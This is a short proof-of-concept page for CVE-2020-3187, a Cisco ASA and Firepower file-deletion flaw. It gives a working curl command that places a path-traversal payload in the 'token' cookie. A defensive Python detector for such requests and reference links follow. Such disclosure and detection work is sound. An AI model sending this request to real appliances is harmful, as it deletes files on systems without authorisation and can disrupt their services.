# Cisco Unauthenticated Arbitrary File Deletion Vulnerability CVE-2020-3187
==Affected systems:==
Cisco Adaptive Security Appliance
Cisco Firepower Threat Defense Software
==POC:==
Example: deleting the logo file:
payload:
/+CSCOU+/csco_logo.gif
Run:
curl -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html
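A defender-side check for the request shape shown above, as an added example that is not part of the original page or any Cisco tooling: it flags requests to that endpoint whose `token` cookie contains a path traversal sequence. The raw-request input format, the function names and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Endpoint and cookie name are taken from the PoC request on this page.
ENDPOINT = "/+CSCOE+/session_password.html"
# ".." as a whole path segment, with either slash style.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")

def parse_request_head(raw):
    """Split a raw HTTP request head into (method, path, headers dict)."""
    lines = raw.strip().splitlines()
    method, target, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, target.split("?", 1)[0], headers

def cookie_value(cookie_header, name):
    """Return the value of one cookie, or None if it is absent."""
    for part in cookie_header.split(";"):
        key, _, value = part.strip().partition("=")
        if key == name:
            return value
    return None

def is_suspicious(raw):
    """True when a request to the endpoint carries a traversal in 'token'."""
    _, path, headers = parse_request_head(raw)
    if unquote(path) != ENDPOINT:
        return False
    token = cookie_value(headers.get("cookie", ""), "token")
    # Decode percent-encoding first so the match runs on the final value.
    return token is not None and bool(TRAVERSAL.search(unquote(token)))

# Constructed sample requests (hypothetical host, not captured traffic).
SAMPLES = [
    "GET /+CSCOE+/session_password.html HTTP/1.1\nHost: vpn.example.test\n"
    "Cookie: token=../+CSCOU+/csco_logo.gif",
    "GET /+CSCOE+/session_password.html HTTP/1.1\nHost: vpn.example.test\n"
    "Cookie: lang=en; token=3f9a1c0b7e",
    "GET /index.html HTTP/1.1\nHost: vpn.example.test\nCookie: token=../x",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(is_suspicious(sample), sample.splitlines()[0])
```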
==More:==
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-3187
https://blog.rapid7.com/2020/05/08/may-2020-cisco-remote-vulnerabilities-guidance/
https://twitter.com/aboul3la/status/1286809567989575685
https://github.com/pry0cc/CVE-2020-3187
https://packetstormsecurity.com/files/158648/Cisco-Adaptive-Security-Appliance-Software-9.7-Arbitrary-File-Deletion.html